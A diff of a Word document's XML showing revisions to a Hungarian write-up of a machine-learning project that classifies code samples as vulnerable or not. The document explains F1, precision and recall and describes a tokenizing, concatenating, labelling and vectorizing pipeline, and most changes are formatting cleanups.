-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16432,18 +14643,8 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">F-1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>score</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>F-1 score</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16467,7 +14668,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Az F1 pontszám a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16478,9 +14678,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>recision</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">recision </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és a</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16491,7 +14696,67 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>és a</w:t>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ecall </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>harmonikus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> átlaga</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>zért ez a pontszám a hamis pozitív</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kat és a hamis negatívokat egyaránt figyelembe veszi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, valamint </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sokkal nagyobb súlyt ad az alacsony értékeknek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16499,114 +14764,30 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ecall</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>harmonikus</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> átlaga</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>zért ez a pontszám a hamis pozitív</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kat és a hamis negatívokat egyaránt figyelembe veszi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, valamint </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>sokkal nagyobb súlyt ad az alacsony értékeknek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve">Ennek eredményeként az osztályozó csak akkor kap magas F-1 pontszámot, ha mind a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve">, mind a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16804,14 +14985,12 @@
         </w:rPr>
         <w:t xml:space="preserve">A 102 darab tanuló kód, amely a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>tanulo_adatok</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16937,21 +15116,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mappában</w:t>
+        <w:t xml:space="preserve"> a tanulo_adatok mappában</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17127,19 +15292,11 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>txt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> kiterjesztéssel.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>txt kiterjesztéssel.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17287,7 +15444,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>nodes</w:t>
+        <w:t>tokenizer</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17335,21 +15492,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>txt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> kiterjesztésű fájljait</w:t>
+        <w:t xml:space="preserve"> .txt kiterjesztésű fájljait</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17415,49 +15558,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> („</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>”, „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>”, „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>raw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>”)</w:t>
+        <w:t xml:space="preserve"> („kind”, „name”, „raw”)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17523,21 +15624,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>azonos nevű .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> kiterjesztésű fájlok</w:t>
+        <w:t>azonos nevű .csv kiterjesztésű fájlok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17603,7 +15690,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egy olyan karakter választja el, ami az értékek között nem fordul elő, ezáltal </w:t>
+        <w:t xml:space="preserve">egy olyan karakter választja el, ami az értékek </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">– továbbiakban tokenek - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">között nem fordul elő, ezáltal </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17659,7 +15758,6 @@
           <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D80A38E" wp14:editId="1B0F2926">
             <wp:extent cx="5156465" cy="495325"/>
@@ -17765,21 +15863,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> következő lépésben a .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlokat </w:t>
+        <w:t xml:space="preserve"> következő lépésben a .csv fájlokat </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17815,43 +15899,313 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv fájlb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> concatenated néven</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>zen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a pont</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">manuálisan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>felcímkéz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>em őket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>nnak duplikáltjá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ban</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> concatenated_titled.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>concatenated.csv fájlb</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a. E</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>zen</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a pont</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>on</w:t>
+        <w:t>második oszlopában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A duplikálás oka, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hogy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> minden egyes újrafuttatásakor a concatenate.py újraírja a concatenated.csv-t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ezáltal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ha a manuális változtatások nem kerülnének át más fájlba, akkor elvesznének</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az összefűzés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> oka</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pedig</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">későbbiekben az egyes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tokenek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gyakorisága lesz fontos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az összes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv viszonylatában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak a saját</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jában.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vectorizer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.py </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>már a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17863,171 +16217,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">manuálisan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>felcímkéz</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>em őket</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nnak duplikáltjában, a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> concatenated_titled.csv</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-ben</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A duplikálás oka, miszerint minden egyes újrafuttatásakor a concatenate.py újraírja a concatenated.csv-t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ezáltal</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ha a manuális változtatások nem kerülnének át más fájlba, akkor elvesznének</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az összefűzés</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> oka</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pedig</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az összes </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> viszonylatában</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>e</w:t>
+        <w:t>összefűzött</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és felcí</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18039,78 +16241,6 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> csak a saját</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>jában.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Így a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vectorizer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.py </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>már a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>összefűzött</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és felcí</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve">kézett </w:t>
       </w:r>
       <w:r>
@@ -18149,14 +16279,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> olyan </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>numpy</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18240,21 +16368,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>__</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
